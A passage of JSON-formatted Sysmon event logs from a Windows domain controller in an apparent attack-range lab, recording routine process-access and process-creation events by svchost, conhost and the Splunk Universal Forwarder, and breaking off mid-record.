{"EventTime":"2020-08-01 05:49:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3961,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:52.918\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:52.918","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3962,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:52.918\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:52.918","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3963,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:52.918\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:52.918","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3964,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:52.918\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:52.918","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3965,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:52.918\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:52.918","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3966,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:52.918\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0280-5F25-0000-00102DEF0500}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:52.918","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0280-5F25-0000-00102DEF0500}","TargetProcessId":"3852","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3967,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:53.059\r\nSourceProcessGUID: {A837DB8D-0280-5F25-0000-00102DEF0500}\r\nSourceProcessId: 3852\r\nSourceThreadId: 4088\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:53.059","SourceProcessGUID":"{A837DB8D-0280-5F25-0000-00102DEF0500}","SourceProcessId":"3852","SourceThreadId":"4088","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3968,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:53.591\r\nProcessGuid: {A837DB8D-0281-5F25-0000-0010F5F00500}\r\nProcessId: 4052\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:49:53.591","ProcessGuid":"{A837DB8D-0281-5F25-0000-0010F5F00500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3969,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:53.590\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0281-5F25-0000-0010F5F00500}\r\nTargetProcessId: 4052\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:53.590","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program 